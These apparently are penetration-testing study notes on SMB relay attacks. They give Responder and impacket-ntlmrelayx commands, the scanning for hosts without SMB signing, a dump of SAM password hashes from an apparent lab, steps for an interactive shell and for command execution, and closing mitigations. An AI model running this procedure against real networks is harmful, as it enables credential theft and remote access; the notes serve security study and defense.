What is?

Instead of cracking hashes generated with Responder, we can instead relay those hashes to specific machines and potentially gain access

Requirements

• SMB signing must be disabled or not enforced on the target

  (Signing enforced = relay won't work; must check using nmap or netexec)

• Relayed user credentials must have local admin rights on the target

  (Otherwise, even a successful relay has limited impact)

• Firewall on the target must allow incoming SMB (port 445) and ICMP (optional)

  (Host firewalls like Windows Defender Firewall may block SMB/ICMP, preventing enumeration, pings, and relays; disable or allow relevant rules)

Steps

1. Identify hosts without SMB signing using Nmap or other vulnerability scanner like Nessus

   1. Look for: Message signing enabled but not required

   nmap --script=smb2-security-mode.nse -p 445 192.168.150.0/24 -Pn (Noisy)
   netexec 192.168.150.0/24 (Quiet, Preferred)
   

   

   

2. Edit Responder.conf to toggle SMB and HTTP to Off to ensure the captured hashes are being relayed

   sudo mousepad /etc/responder/Responder.conf
   

   

3. Run Responder

4. Set up your relay using ntlmrelayx. When the Responder captures a hash, it’ll forward the hash to this NTLM relay, and the relay will forward the hash to the selected targets

   impacket-ntlmrelayx -tf targets.txt -smb2support
   

   

5. An Event Occurs

   

6. Win

   

   The SAM hashes are dumped in the below .sam file

   

   Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
   Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
   DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
   WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0059cd11c3efaa5d1d145f9bf0218387:::
   peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
   

7. Other Wins

   1. Add -i at the end of ntlmrelayx command to get an interactive shell

      impacket-ntlmrelayx -tf targets.txt -smb2support -i
      

      

      • Use nc to connect to the shell

      nc 127.0.0.1 11000
      

      

      

   2. Run command using -c at the end of ntlmrelayx command:

      impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"
      

Mitigation Strategies:

• Enable SMB Signing on all devices:

  • Pro: Completely stops the attack
  • Con: Can cause performance issues with file copies

• Disable NTLM authentication on network:

  • Pro: Completely stops the attack
  • Con: If Kerberos stops working, Windows defaults back to NTLM

• Account tiering:

  • Pro: Limits domain admins to specific tasks (e.g. only log onto servers with need for DA)
  • Con: Enforcing the policy may be difficult